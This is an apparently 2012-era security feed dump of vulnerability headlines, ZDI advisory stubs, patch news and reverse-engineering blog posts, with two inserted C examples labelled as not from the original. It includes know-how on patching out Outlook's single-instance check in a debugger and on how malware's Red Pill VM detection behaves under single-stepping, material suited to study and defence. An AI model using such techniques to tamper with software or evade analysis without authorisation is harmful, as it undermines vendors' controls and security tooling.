==> Microsoft Internet Explorer 610 Mouse Tracking

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Microsoft Internet Explorer 610 Mouse Tracking Risk: Medium Text:Summary: Unprivileged attackers can track your system-wide mouse

==> Oracle MySQL For Microsoft Windows MOF Execution

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Oracle MySQL For Microsoft Windows MOF Execution Risk: Medium Text:## # This file is part of the Metasploit Framework and may be

==> Microsoft Internet Explorer 7 Denial Of Service

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Microsoft Internet Explorer 7 Denial Of Service Risk: Low Text: I want to warn you about Denial of Service vulnerabilities in Internet

==> remote - Microsoft windows remote desktop PoC C# Exploit

http://www.1337day.com/rss

==> dos / - Microsoft Internet Explorer 7 Denial Of Service

http://www.1337day.com/rss

==> remote - Oracle MySQL for Microsoft Windows MOF Execution Vulnerability

http://www.1337day.com/rss

==> Patch Tuesday: Five critical bulletins, Exchange Server fix expected

http://feeds.pheedo.com/tt/1323 In addition to Exchange Server, updates fix flaws in Internet Explorer, Microsoft Office and Microsoft Word.

==> ZDI-CAN-1675: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'c1d2d9acc746ae45eeb477b97fa74688' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1674: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 4.3 (AV:A/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1672: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1592: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'FuzzMyApp' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1691: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2012-11-20, 20 days ago. The vendor is given until 2013-05-19 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1683: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Arthur Gerkis' was reported to the affected vendor on: 2012-11-20, 20 days ago. The vendor is given until 2013-05-19 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1604: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tom Gallagher, Microsoft & Paul Bates, Microsoft' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will

==> ZDI-CAN-1602: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tom Gallagher (Microsoft) & Paul Bates (Microsoft)' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the

==> ZDI-CAN-1655: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:M/Au:N/C:C/I:C/A:P) severity vulnerability discovered by 'Stephen Fewer of Harmony Security (www.harmonysecurity.com)' was reported to the affected vendor on: 2012-11-09, 31 days ago. The vendor is given until 2013-05-08 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1598: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:M/Au:N/C:C/I:C/A:P) severity vulnerability discovered by 'SkyLined' was reported to the affected vendor on: 2012-11-09, 31 days ago. The vendor is given until 2013-05-08 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1550: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Stephen Fewer of Harmony Security (www.harmonysecurity.com)' was reported to the affected vendor on: 2012-11-09, 31 days ago. The vendor is given until 2013-05-08 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1651: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2012-11-08, 32 days ago. The vendor is given until 2013-05-07 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1640: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:M/Au:N/C:C/I:C/A:P) severity vulnerability discovered by 'Omair (www.krash.in)' was reported to the affected vendor on: 2012-11-08, 32 days ago. The vendor is given until 2013-05-07 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1648: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-10-30, 41 days ago. The vendor is given until 2013-04-28 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1649: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-10-24, 47 days ago. The vendor is given until 2013-04-22 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1586: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-07-24, 139 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1574: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-07-24, 139 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1514: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2012-07-24, 139 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1515: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2012-07-16, 147 days ago. The vendor is given until 2013-01-12 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1526: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-03-14, 271 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1525: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-03-14, 271 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1524: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-03-14, 271 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1523: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-03-14, 271 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1520: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-03-14, 271 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1281: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2011-05-25, 565 days ago. The vendor is given until 2011-11-21 to publish a fix or workaround. Once the vendor has created and tested a

==> Attention shoppers: Patch IE now before you shop online

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Today is the eleventh Patch Tuesday of 2012, but the first since the official launch of Windows 8 and Windows RT. There are six new security bulletins, a couple of which are particularly urgent, especially for anyone planning to do any online shopping this holiday season. There are four security bulletins rated as Critical, one Important, and one Moderate. The Critical security bulletins address issues with Internet Explorer, Windows kernel-mode drivers, the .NET framework, and flaws in Windows shell code that can allow remote exploits. The most crucial of the six security bulletins is the cumulative update for Internet Explorer, MS12-071. Andrew Storms, director of security operations for nCircle, declares, "Topping our patch immediately list this month is the drive-by exploit affecting Internet Explorer 9. It's fairly obvious that Microsoft patched this bug in IE10 before its release; otherwise, we would have a bulletin affecting both IE9 and IE10."

==> Operating System Choice Does Not Equal Security

http://hellnbak.wordpress.com/feed/ Yesterday while some of us in the USA were enjoying a day off, Google made the news with this article in the Financial Times stating that they are moving away from Microsoft Windows due to security concerns. My first reaction was to question why a company with as many smart brains as Google would make such [...]

==> Information Security Events For December

http://infosecevents.net/feed/ Here are information security events in North America this month: Conference on Fraud and Forensics : December 5 to 6 in Florida USA Bay Threat : December 7 to 8 in California, USA Microsoft BlueHat : December 13 to 14 in Washington, USA Bsides Seattle: December 15 in Seattle, [...]

==> Interesting Information Security Bits for 11/03/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. Microsoft: Trojans are huge and China is tops in browser exploits | Latest Security News – CNET News An interesting report has been put out by Microsoft that is worth a gander. Google patches [...]

==> Cross Your T's and Dot Your Filenames

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I was developing some automation code recently and found that a process that I was injecting code into was crashing. At first I thought it was an error in my injected code, but when I looked at the crash-dump, I was amazed to see that the issue was in MFC42.DLL:

    MOV EBX,104
    PUSH EBX
    LEA EAX,DWORD PTR SS:[EBP+szBuffer]
    PUSH EAX
    PUSH DWORD PTR DS:[ESI+6C]
    CALL DWORD PTR DS:[<&KERNEL32.GetModuleFileNameA>]
    LEA EAX,DWORD PTR SS:[EBP+szBuffer]
    PUSH 2E
    PUSH EAX
    CALL DWORD PTR DS:[<&msvcrt._mbsrchr>]
    POP ECX
    POP ECX
    MOV DWORD PTR SS:[EBP-80],EAX
    MOV BYTE PTR DS:[EAX],0          <-- Crash!

The code above is from MFC42.DLL, version 6.2.4131.0 from Windows XP SP2. It effectively does the following:

    GetModuleFileName(NULL, szBuffer, MAX_PATH);
    *(_mbsrchr(szBuffer, '.')) = 0;

The function _mbsrchr(...) returns NULL if the character searched for is not found. This means that if there is no '.' in the current process's filename (which was the case for the file I was testing) then the line marked "Crash!" above will try to write the byte 0x00 to address 0x00000000, which will cause a crash. I figured that this was some obscure function from MFC42.DLL that most applications don't make use of, however, after a little digging it turns out that this code is in CWinApp::SetCurrentHandles(), which is called by AfxWinInit(...). From http://msdn2.microsoft.com/en-us/library/w04bs753(vs.80).aspx: "[AfxWinInit] is called by the MFC-supplied WinMain function, as part of the CWinApp initialization of a GUI-based application, to initialize MFC." In other words, almost every MFC GUI program executes the code snippet above! As surprised as I was by this, I figured that surely this had been fixed for Vista. Believe it or not, the same issue exists!

Below is the code from MFC42.DLL version 6.6.8063.0 from Windows Vista Gold:

    PUSH 104
    LEA EDX,DWORD PTR SS:[EBP+szBuffer]
    MOV [EDI+0C],ECX
    MOV EAX,DWORD PTR DS:[ESI+6C]
    PUSH EDX
    PUSH EAX
    CALL DWORD PTR DS:[<&KERNEL32.GetModuleFileNameA>]
    TEST EAX,EAX
    JZ LOC_722F1484
    CMP EAX,104
    JZ LOC_722F1484
    LEA ECX,[EBP+szBuffer]
    PUSH 2E
    PUSH ECX
    CALL __mbsrchr
    MOV EBX,EAX
    ADD ESP,8
    TEST EBX,EBX
    MOV [EBP+VAR_310],EBX
    JZ LOC_7230DB7D
    ...

    __mbsrchr:
    MOV EDI,EDI
    PUSH EBP
    MOV EBP,ESP
    POP EBP
    JMP DWORD PTR DS:[<&msvcrt._mbsrchr>]

    LOC_7230DB7D:
    ...
    JMP DWORD PTR DS:[<&msvcrt.CxxThrowException>]

While the code above checks for the lack of a '.' in the filename, it still throws an exception and causes a crash if there's no '.'. The good news is that it doesn't seem easy to accidentally execute an executable file without a '.' in the filename in Vista:

    C:\>copy c:\windows\notepad.exe notepad_exe
            1 file(s) copied.

    C:\>notepad_exe
    'notepad_exe' is not recognized as an internal or external command,
    operable program or batch file.

    C:\>start notepad_exe
    [This opens the "Open With" dialog box in Explorer instead of executing the file.]

However, it is still possible to run non-dotted files via API functions like CreateProcess(...) to cause the crash described above.
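The defect above is a missing NULL check on a "find the last '.'" call, and the right fix is not just the check but also searching only the final path component. The following is an added example, not code from the original post or from MFC: portable C, with strrchr standing in for _mbsrchr, every path a constructed string rather than the result of GetModuleFileName(), and the unchecked variant returning 0 at the point where the MFC42 code would have written through a NULL pointer.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not code from the original post. strrchr stands in for
 * _mbsrchr; the paths below are constructed strings. */

/* The MFC42 pattern: assumes the module path always contains a '.'.
 * Returns 1 when it truncated the buffer, 0 where the original code would
 * instead have written a zero byte through a NULL pointer. */
int strip_extension_unchecked(char *path)
{
    char *dot = strrchr(path, '.');
    if (dot == NULL)
        return 0;                /* original: *(NULL) = 0 -> access violation */
    *dot = '\0';
    return 1;
}

/* Defensive version: look for the '.' only inside the final path component
 * (a '.' in a directory name is not an extension) and leave the buffer
 * untouched when there is nothing to strip. Returns 1 if it truncated. */
int strip_extension_checked(char *path)
{
    char *base = path;
    for (char *p = path; *p != '\0'; p++) {
        if (*p == '\\' || *p == '/')
            base = p + 1;        /* character after the last separator so far */
    }
    char *dot = strrchr(base, '.');
    if (dot == NULL || dot == base)
        return 0;                /* no extension, or a leading-dot name */
    *dot = '\0';
    return 1;
}

int main(void)
{
    /* Constructed inputs: the notepad_exe case from the post, plus a path
     * whose only '.' sits in a directory name. */
    char with_ext[] = "C:\\Windows\\notepad.exe";
    char no_dot[]   = "C:\\Windows\\notepad_exe";
    char dir_dot_a[] = "C:\\build.v2\\notepad_exe";
    char dir_dot_b[] = "C:\\build.v2\\notepad_exe";

    printf("checked:   %d -> %s\n", strip_extension_checked(with_ext), with_ext);
    printf("unchecked: %d -> %s (the MFC42 code would have crashed here)\n",
           strip_extension_unchecked(no_dot), no_dot);
    printf("unchecked: %d -> %s (truncated inside a directory name)\n",
           strip_extension_unchecked(dir_dot_a), dir_dot_a);
    printf("checked:   %d -> %s (left alone)\n",
           strip_extension_checked(dir_dot_b), dir_dot_b);
    return 0;
}
```

The return value is there so callers can tell "nothing to strip" apart from "stripped"; the original MFC code had no such signal, which is why the Vista version could only throw once it finally checked the pointer.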

==> Refreshing the Taskbar Notification Area

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I am working on an automation system that involves forcefully terminating a process that creates an icon in the Taskbar Notification Area (no, not the "system tray"). It is the responsibility of the process that creates an icon in the Taskbar Notification Area to remove the icon when the process exits, however, since I am using TerminateProcess(...) to remotely kill the process, the code to remove the icon never gets executed. As such, the icon remains in the Taskbar Notification Area until one moves the mouse cursor over the icon, at which point it disappears. Since this is an automation system that's being developed, this icon-creating process will get executed many times, and if left unchecked would end up leaving hundreds of icons in the Taskbar Notification Area (one icon per execution). That's bad. Despite my best Googling efforts ("refresh notification area", "redraw system tray", etc.), I wasn't able to find elegant code to solve this problem. I found some novel solutions, though. The most common suggestion was to use SetCursor(...) to drag the mouse cursor around the Taskbar Notification Area; while this works, it's an ugly hack and is actually quite slow. One of my "favorite" suggestions was to associate each icon in the Taskbar Notification Area with a process, monitor each process for termination, and delete the icon once the given process terminates (talk about overkill... geeze). When a user moves the mouse over a "dead icon" in the Taskbar Notification Area, some window message must get sent to the window to cause it to say to itself, "hey, the mouse is over me, so let me see if the process that created this icon is still alive.... Oh, it's not? Let me remove the icon, then." I wanted to find what window message was causing that code to fire so that I could send that message to the window myself.
I started up Microsoft Spy++ and saw the following information for the Taskbar Notification Area and its parent windows: [Spy++ window-hierarchy screenshot not included in the feed.] A useful feature of Microsoft Spy++ is that it allows you to monitor window messages sent to a given window. I started monitoring the window messages getting sent to the "Notification Area" window without moving my mouse over the window and saw the following messages getting sent:

    * TB_BUTTONCOUNT
    * TB_GETBUTTONINFOW
    * TB_SETBUTTONINFOW
    * WM_PAINT
    * WM_ERASEBKGND

The messages above clearly had nothing to do with me moving my mouse (since I wasn't moving my mouse over the window), so I configured Microsoft Spy++ to filter out those messages. Then I moved my mouse over the "dead icon" in question and saw the following messages:

    <00001> 00010056 S WM_NCHITTEST xPos:1491 yPos:1024
    <00002> 00010056 R WM_NCHITTEST nHittest:HTCLIENT
    <00003> 00010056 S WM_SETCURSOR hwnd:00010056 nHittest:HTCLIENT wMouseMsg:WM_MOUSEMOVE
    <00004> 00010056 R WM_SETCURSOR fHaltProcessing:False
    <00005> 00010056 P WM_MOUSEMOVE fwKeys:0000 xPos:5 yPos:0
    <00006> 00010056 S TB_HITTEST pptHitTest:022BFC18
    <00007> 00010056 R TB_HITTEST iIndex:0
    <00008> 00010056 S TB_DELETEBUTTON iButton:0
    <00009> 00010056 R TB_DELETEBUTTON fSucceeded:True

Aha! So either WM_NCHITTEST, WM_SETCURSOR, WM_MOUSEMOVE, or TB_HITTEST leads to the TB_DELETEBUTTON getting sent. After trying to send each window message manually with SendMessage(...), I found which window message was the catalyst: WM_MOUSEMOVE.
With this new-found knowledge, I was able to whip up the following code to refresh the Taskbar Notification Area:

    #define FW(x,y) FindWindowEx(x, NULL, y, L"")

    void RefreshTaskbarNotificationArea()
    {
        HWND hNotificationArea;
        RECT r;

        /* Walk Shell_TrayWnd -> TrayNotifyWnd -> SysPager -> "Notification Area"
           toolbar and fetch its client rectangle. */
        GetClientRect(
            hNotificationArea = FindWindowEx(
                FW(FW(FW(NULL, L"Shell_TrayWnd"), L"TrayNotifyWnd"), L"SysPager"),
                NULL,
                L"ToolbarWindow32",
                L"Notification Area"),
            &r);

        /* Sweep a synthetic WM_MOUSEMOVE over the whole area in 5-pixel steps;
           lParam packs y in the high word and x in the low word. */
        for (LONG x = 0; x < r.right; x += 5)
            for (LONG y = 0; y < r.bottom; y += 5)
                SendMessage(
                    hNotificationArea,
                    WM_MOUSEMOVE,
                    0,
                    (y << 16) + x);
    }

==> Stateless Bi-Directional Proxy

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx After submitting my first patent two years ago to the US Patent Office, it has finally been published online! You can read all the juicy details here and you can see diagrams here if you have a TIFF-renderer browser plug-in. This patent was from when I was still on the Firewall team at Microsoft, so it's network-related. The other patents of mine that should get published on the web over the next two years are from when I was on the Anti-Malware team at Microsoft, so they're related to binary analysis... in other words, even cooler than this one ;)

==> Investigating Outlook's Single-Instance Restriction (PART 1)

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx If you use Outlook and have multiple e-mail account profiles, you know how frustrating it is to have Outlook restrict you to a single running instance of Outlook per interactive login. For those of you not familiar with this "feature", here's the scoop: if you have one instance of Outlook running and then launch another instance, a new Outlook window is created in the context of the original instance, but you don't have the option to load another e-mail account profile. This is a pain because it requires you to close and restart Outlook each time you want to check a different e-mail account (assuming you have a separate profile for each account). Tim Mullen, a colleague of mine, had the ingenious idea of using RunAs to launch the second Outlook process as another user, to try to circumvent whatever "feature" was restricting Outlook to a single instance. "What a great idea!" I thought, and I kicked myself for not having thought of that myself! But when we tested it out, it had the same results as running a second instance of Outlook without RunAs; an extra window popped up for the first instance and we weren't given the option to load another profile. This piqued my interest and I wondered how Outlook was determining whether or not another instance was already running in the interactive login session. Typically when I'm trying to figure out how specific functionality works, I have an API function or string to use as my guide. For example, if I'm red-teaming a DRM solution and I get a message box saying, "Invalid license key." then I can search in the binary for that string to see what code references it, or I can set a breakpoint on the Windows API functions that display message boxes. However, for the case of Outlook here, I didn't have any strings to base my investigation on, and I didn't know which API function(s) were being used to check for the first instance. 
My first idea was to use an API logging tool like AutoDebug and run it once on the first Outlook session and once on the second Outlook session. I could then compare the API call logs and see where they differed, and then begin to investigate what caused them to differ at that point. However, I quickly found that API loggers such as AutoDebug are not suited for such a heavyweight program as Outlook (which imports a few thousand DLLs and a few million API functions (yes, I'm exaggerating, but it's still a lot)). My second idea was to use a conditional-branch logger, such as http://www.woodmann.com/ollystuph/Conditional_Branch_Logger_v1.0.zip and run the same comparison as described above. However, I didn't have that plugin downloaded at the time and I didn't have Internet access, so I had to make do with what was already on my laptop. I used Process Explorer to watch what happens when the second instance of Outlook is launched. Sure enough, the process starts and then terminates. So I used OllyDbg to set a breakpoint on ExitProcess(...) to see if I could get a decent call-stack to see what code in Outlook led to the ExitProcess(...) call. The good news is that this allowed me to find the code that led to the process termination. The bad news is that it was called via _cexit(...) from ___tmainCRTStartup(...), so whatever code was detecting the first instance of Outlook was bailing out via ret's, not via a direct call to _cexit(...) or ExitProcess(...). This led me to the old trustworthy Trial-and-Error-with-F8 method. The idea is simple -- starting from the process's Entry Point, step over (F8 in OllyDbg) every function call until you see the desired results, at which point you know the code in question lies within that function call. For this case, I was watching for a new window to pop up in the context of the first Outlook instance; by that time the check would already have been made to see if another instance of Outlook was running.
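The log-comparison idea above (run an API logger once per instance, then find where the two traces first differ) has one practical snag: handles and addresses differ between runs even when the program does exactly the same thing, so a naive line-by-line diff reports noise long before the real branch point. The following is an added example, not code from the original post and not AutoDebug's format: it normalizes hex literals before comparing, but keeps a zero value distinct from a non-zero one, because a NULL versus non-NULL return is exactly the kind of difference the comparison is meant to surface. The two traces are constructed to mirror the FindWindowA check the post later finds, not captured from Outlook.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Added example, not from the original post. The traces are constructed;
 * no real API-logger output format is assumed. */

#define MAX_LINE 256
#define LINES(a) (sizeof(a) / sizeof((a)[0]))

static int is_hex(char ch) { return isxdigit((unsigned char)ch) != 0; }

/* Copy `in` to `out`, replacing each 0x-prefixed hex literal with "0" if its
 * value is zero and "#" otherwise. Handles and addresses therefore compare
 * equal across runs, while a NULL vs. non-NULL result stays visible. */
void normalize_line(const char *in, char *out, size_t outsz)
{
    size_t o = 0;
    const char *p = in;
    while (*p != '\0' && o + 1 < outsz) {
        if (p[0] == '0' && (p[1] == 'x' || p[1] == 'X') && is_hex(p[2])) {
            const char *d = p + 2;
            int all_zero = 1;
            while (is_hex(*d)) {
                if (*d != '0')
                    all_zero = 0;
                d++;
            }
            out[o++] = all_zero ? '0' : '#';
            p = d;
        } else {
            out[o++] = *p++;
        }
    }
    out[o] = '\0';
}

/* Index of the first line whose normalized form differs between the logs;
 * the shorter log's length if one is a prefix of the other; -1 if the logs
 * are identical after normalization. */
int first_divergence(const char *const *a, size_t na,
                     const char *const *b, size_t nb)
{
    size_t n = na < nb ? na : nb;
    char la[MAX_LINE], lb[MAX_LINE];
    for (size_t i = 0; i < n; i++) {
        normalize_line(a[i], la, sizeof la);
        normalize_line(b[i], lb, sizeof lb);
        if (strcmp(la, lb) != 0)
            return (int)i;
    }
    return na == nb ? -1 : (int)n;
}

/* Constructed traces: a first instance that finds no existing window, and a
 * second instance that does. Module base and handle values are made up. */
static const char *const RUN1[] = {
    "GetModuleHandleA(NULL) = 0x30000000",
    "FindWindowA(\"mspim_wnd32\", \"Microsoft Outlook\") = 0x00000000",
    "CreateWindowExA(...) = 0x000A0B2C",
};
static const char *const RUN2[] = {
    "GetModuleHandleA(NULL) = 0x30000000",
    "FindWindowA(\"mspim_wnd32\", \"Microsoft Outlook\") = 0x00020384",
    "SendMessageA(0x00020384, ...) = 0x00000000",
};

int main(void)
{
    int i = first_divergence(RUN1, LINES(RUN1), RUN2, LINES(RUN2));
    if (i < 0)
        printf("logs identical after normalization\n");
    else if ((size_t)i >= LINES(RUN1) || (size_t)i >= LINES(RUN2))
        printf("one log is a prefix of the other; divergence at line %d\n", i);
    else
        printf("first divergence at line %d:\n  run1: %s\n  run2: %s\n",
               i, RUN1[i], RUN2[i]);
    return 0;
}
```

Without the zero-preserving rule both FindWindowA lines would normalize to the same text and the reported divergence would slide one line later, to the first call that depends on the result; with it, the comparison points straight at the check.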
The great thing about this approach is that it's incredibly straightforward. The downside is that if you're looking for functionality that doesn't happen near the beginning of the process execution, it can be very time consuming. Luckily though, this method worked like a charm for Outlook! I started the second Outlook process in OllyDbg, stepped over the first call and into a jump. No windows popped up yet, so I hadn't yet stepped over the call-in-question. I kept pressing F8 until I found that when I tried stepping over the call from address 0x2FD251C8 (this of course is specific to my computer; your addresses will differ), an Outlook window popped up in the context of the first Outlook process. So I set a breakpoint on 0x2FD251C8 and restarted my second Outlook process, this time stepping in (F7) to that call and pressing F8 again until I found the next call that opened the first Outlook window. I found that stepping over the call at address 0x2FD25228 caused the window to pop up, so I set a breakpoint on that address, restarted, stepped in, and continued this process for about two minutes until I found the following code:

    .text:30006BB7 push    offset WindowName   ; "Microsoft Outlook"
    .text:30006BBC push    offset aMspim_wnd32 ; "mspim_wnd32"
    .text:30006BC1 mov     [ebp+var_42C], edi
    .text:30006BC7 call    ds:FindWindowA

This looks like the culprit! During Outlook's initialization, it checks to see if a window named "Microsoft Outlook" with class name "mspim_wnd32" exists, and if so, it assumes that another instance is already running. To test this, I set the return value of FindWindowA(...) from the call above to NULL, and Outlook opened a full second instance of itself in a separate process, and allowed me to use a different account profile. This is a great example of where a very straightforward reverse-engineering approach (Trial-and-Error-with-F8) can yield excellent results in just a few minutes given the right conditions.
As a disclaimer, I don't know the reason that the Outlook development team decided to restrict Outlook to a single instance. Perhaps multiple instances will cause massive data corruption. In other words, if you're going to patch your Outlook executable so that it does allow for multiple instances, do so at your own risk! This post is continued in Part 2.

==> Career Shift

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx Friday, April 20th will be my final day at Microsoft. I will be joining NGS in the coming weeks as a Principal Security Consultant. I've copied all of my old blog posts from http://blogs.msdn.com to http://www.malwareanalysis.com though unfortunately I was not able to save the old comments. My new personal e-mail address is jasonATmalwareanalysisDOTcom.

==> When the Red Pill is Hard to Swallow

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I was looking at a malware sample last week that used a variation of Joanna Rutkowska's infamous Red Pill (http://invisiblethings.org/papers/redpill.html) to determine whether or not the malware was being run from inside a Virtual Machine. Based on the Red Pill concept, the guest OS's IDTR should be different from the host OS's IDTR. I was using Virtual PC to step through the malware sample in OllyDbg, with the goal of skipping the conditional jump after SIDT that led to the detection of my VM (see http://download.intel.com/design/Pentium4/manuals/25366720.pdf#page=275 for details on the SIDT instruction). You can imagine my surprise when SIDT returned 0x8003F400 as the base address of the IDT, which is the same base address of the IDT for my host Windows XP system! My first thought was that maybe the Virtual PC team figured out some ingenious way to make this happen via the Virtual Machine Additions add-on (see http://www.microsoft.com/technet/prodtechnol/virtualserver/2005/proddocs/vs_tr_components_additions.mspx?mfr=true). So I uninstalled Virtual Machine Additions, rebooted, and tried again. To my continued surprise, OllyDbg was still showing the host OS's IDTR when stepping through the SIDT instruction on my guest OS. After some more thinking, I thought, "maybe it has something to do with the fact that I'm single-stepping through SIDT in OllyDbg." To test this hypothesis, I set a breakpoint after the SIDT instruction, and ran the program from the start. Sure enough, SIDT returned 0xF9CB6440 as the base address of the IDT that time. The whole trick behind the Red Pill is that VMs don't typically have the opportunity to intercept SIDT since it's not a privileged instruction.
However, when the Trap Flag is set (due to single-stepping), Virtual PC intercepts the int 1 interrupt and can execute the current instruction however it pleases; when it has the opportunity, it will use the host's IDTR for the SIDT instruction. Hopefully this knowledge will make the Red Pill a little easier for you to swallow (or spit-out if the Trap Flag is set).

==> Terms of the Trade

